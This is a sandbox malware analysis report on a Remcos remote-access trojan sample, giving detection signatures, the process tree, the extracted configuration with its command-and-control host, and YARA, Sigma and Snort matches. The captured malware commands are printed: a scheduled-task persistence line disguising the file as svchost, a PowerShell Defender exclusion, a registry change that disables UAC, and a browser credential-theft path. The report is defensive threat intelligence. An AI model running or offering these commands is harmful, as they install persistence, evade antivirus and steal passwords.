Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LisectAVT_2403002A_136.exe

Overview

General Information

Sample name:LisectAVT_2403002A_136.exe
Analysis ID:1482506
MD5:404e164e7c5f003a1ac5ec58ce77a534
SHA1:93fa2afce7ee9c58c046c7307a0c30ffc6cf7834
SHA256:479578f34c0fa25de3528e6146737205931d3f4914d2f4f8f3e4da0be600162c
Tags:exeRemcosRAT
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Schedule system process
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Disables UAC (registry)
Drops PE files with benign system names
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Uses regedit.exe to modify the Windows registry
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • LisectAVT_2403002A_136.exe (PID: 7620 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002A_136.exe" MD5: 404E164E7C5F003A1AC5EC58CE77A534)
    • cmd.exe (PID: 7840 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7916 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 7856 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD64D.tmp.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 7944 cmdline: timeout 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • svchost.exe (PID: 8048 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 404E164E7C5F003A1AC5EC58CE77A534)
        • powershell.exe (PID: 7452 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 6332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ngen.exe (PID: 7544 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe" MD5: 417D6EA61C097F8DF6FEF2A57F9692DF)
        • WerFault.exe (PID: 7820 cmdline: C:\Windows\system32\WerFault.exe -u -p 8048 -s 1176 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
        • WerFault.exe (PID: 1544 cmdline: C:\Windows\system32\WerFault.exe -u -p 8048 -s 1176 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 7700 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7964 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: 404E164E7C5F003A1AC5EC58CE77A534)
    • powershell.exe (PID: 8032 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • csc.exe (PID: 8164 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
    • WerFault.exe (PID: 5588 cmdline: C:\Windows\system32\WerFault.exe -u -p 7964 -s 1196 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 4324 cmdline: C:\Windows\system32\WerFault.exe -u -p 7964 -s 1196 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 7256 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 3104 cmdline: C:\Windows\system32\WerFault.exe -pss -s 464 -p 7964 -ip 7964 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 1156 cmdline: C:\Windows\system32\WerFault.exe -pss -s 436 -p 8048 -ip 8048 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 3596 cmdline: C:\Windows\system32\WerFault.exe -pss -s 552 -p 8048 -ip 8048 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 3252 cmdline: C:\Windows\system32\WerFault.exe -pss -s 548 -p 1072 -ip 1072 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 5700 cmdline: C:\Windows\system32\WerFault.exe -pss -s 548 -p 7964 -ip 7964 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 7864 cmdline: C:\Windows\system32\WerFault.exe -pss -s 516 -p 7920 -ip 7920 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 7624 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 1072 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 404E164E7C5F003A1AC5EC58CE77A534)
    • powershell.exe (PID: 2552 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wmplayer.exe (PID: 2052 cmdline: "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" MD5: A7790328035BBFCF041A6D815F9C28DF)
    • wmplayer.exe (PID: 6580 cmdline: "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" MD5: A7790328035BBFCF041A6D815F9C28DF)
    • WerFault.exe (PID: 2624 cmdline: C:\Windows\system32\WerFault.exe -u -p 1072 -s 1424 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 7920 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 404E164E7C5F003A1AC5EC58CE77A534)
    • powershell.exe (PID: 8116 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • iexplore.exe (PID: 5992 cmdline: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" MD5: 6F0F06D6AB125A99E43335427066A4A1)
    • regedit.exe (PID: 5572 cmdline: "C:\Windows\regedit.exe" MD5: 999A30979F6195BF562068639FFC4426)
    • vbc.exe (PID: 7172 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
    • vbc.exe (PID: 7680 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
    • WerFault.exe (PID: 3184 cmdline: C:\Windows\system32\WerFault.exe -u -p 7920 -s 1128 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 1676 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "Xerverfebarch.duckdns.org:5841:1", "Assigned name": "7272626", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "72626-GNX3E4", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
00000013.00000002.1399874525.00000000050A7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000009.00000002.1563081980.000001389A606000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      0000000D.00000002.3811250705.0000000005577000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000C.00000002.1528643546.0000013F4F016000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          0000000C.00000002.1528643546.0000013F4F016000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0xddc98:$a1: Remcos restarted by watchdog!
          • 0x1532e0:$a1: Remcos restarted by watchdog!
          • 0xde1f0:$a3: %02i:%02i:%02i:%03i
          • 0x153838:$a3: %02i:%02i:%02i:%03i
          • 0xde575:$a4: * Remcos v
          • 0x153bbd:$a4: * Remcos v
          Click to see the 49 entries
          SourceRuleDescriptionAuthorStrings
          29.2.wmplayer.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            29.2.wmplayer.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x691e0:$a1: Remcos restarted by watchdog!
            • 0x69738:$a3: %02i:%02i:%02i:%03i
            • 0x69abd:$a4: * Remcos v
            29.2.wmplayer.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
            • 0x641e4:$str_a1: C:\Windows\System32\cmd.exe
            • 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x6320c:$str_b2: Executing file:
            • 0x64328:$str_b3: GetDirectListeningPort
            • 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x63e30:$str_b7: \update.vbs
            • 0x63234:$str_b9: Downloaded file:
            • 0x63220:$str_b10: Downloading file:
            • 0x632c4:$str_b12: Failed to upload file:
            • 0x642f0:$str_b13: StartForward
            • 0x64310:$str_b14: StopForward
            • 0x63dd8:$str_b15: fso.DeleteFile "
            • 0x63d6c:$str_b16: On Error Resume Next
            • 0x63e08:$str_b17: fso.DeleteFolder "
            • 0x632b4:$str_b18: Uploaded file:
            • 0x63274:$str_b19: Unable to delete:
            • 0x63da0:$str_b20: while fso.FileExists("
            • 0x63749:$str_c0: [Firefox StoredLogins not found]
            29.2.wmplayer.exe.400000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewerdetects Windows exceutables potentially bypassing UAC using eventvwr.exeditekSHen
            • 0x63100:$s1: \Classes\mscfile\shell\open\command
            • 0x63160:$s1: \Classes\mscfile\shell\open\command
            • 0x63148:$s2: eventvwr.exe
            19.2.ngen.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 78 entries

              System Summary

              barindex
              Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\LisectAVT_2403002A_136.exe, ProcessId: 7620, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe
              Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002A_136.exe", ParentImage: C:\Users\user\Desktop\LisectAVT_2403002A_136.exe, ParentProcessId: 7620, ParentProcessName: LisectAVT_2403002A_136.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 7840, ProcessName: cmd.exe
              Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002A_136.exe", ParentImage: C:\Users\user\Desktop\LisectAVT_2403002A_136.exe, ParentProcessId: 7620, ParentProcessName: LisectAVT_2403002A_136.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 7840, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7964, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, ProcessId: 8032, ProcessName: powershell.exe
              Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3104, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7964, ProcessName: svchost.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3104, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7964, ProcessName: svchost.exe
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\svchost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\LisectAVT_2403002A_136.exe, ProcessId: 7620, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7964, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, ProcessId: 8032, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , CommandLine: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7840, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , ProcessId: 7916, ProcessName: schtasks.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD64D.tmp.bat"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7856, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 8048, ProcessName: svchost.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7964, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, ProcessId: 8032, ProcessName: powershell.exe
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7700, ProcessName: svchost.exe

              Persistence and Installation Behavior

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002A_136.exe", ParentImage: C:\Users\user\Desktop\LisectAVT_2403002A_136.exe, ParentProcessId: 7620, ParentProcessName: LisectAVT_2403002A_136.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 7840, ProcessName: cmd.exe
              No Snort rule has matched
              Timestamp:2024-07-25T23:59:00.550615+0200
              SID:2036594
              Source Port:49735
              Destination Port:5841
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-07-25T23:55:25.686720+0200
              SID:2036594
              Source Port:49737
              Destination Port:5841
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-07-25T23:58:38.108502+0200
              SID:2036594
              Source Port:49734
              Destination Port:5841
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-07-25T23:57:08.332725+0200
              SID:2036594
              Source Port:49730
              Destination Port:5841
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-07-25T23:56:28.494106+0200
              SID:2022930
              Source Port:443
              Destination Port:49729
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-07-25T23:58:15.639944+0200
              SID:2036594
              Source Port:49733
              Destination Port:5841
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-07-25T23:56:45.785746+0200
              SID:2036594
              Source Port:49728
              Destination Port:5841
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-07-25T23:56:23.330651+0200
              SID:2036594
              Source Port:49727
              Destination Port:5841
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-07-25T23:57:30.731799+0200
              SID:2036594
              Source Port:49731
              Destination Port:5841
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-07-25T23:57:53.124261+0200
              SID:2036594
              Source Port:49732
              Destination Port:5841
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-07-25T23:59:23.078437+0200
              SID:2036594
              Source Port:49736
              Destination Port:5841
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-07-25T23:55:50.446155+0200
              SID:2022930
              Source Port:443
              Destination Port:49721
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-07-25T23:56:00.430258+0200
              SID:2036594
              Source Port:49711
              Destination Port:5841
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: LisectAVT_2403002A_136.exeAvira: detected
              Source: 00000013.00000002.1399874525.00000000050A7000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "Xerverfebarch.duckdns.org:5841:1", "Assigned name": "7272626", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "72626-GNX3E4", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Source: Yara matchFile source: 29.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.svchost.exe.13f4f101900.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 39.2.svchost.exe.1c227360bd8.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.svchost.exe.20a4568b350.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.svchost.exe.20a45700998.1.raw.unpack, type: UNPACKEDPE
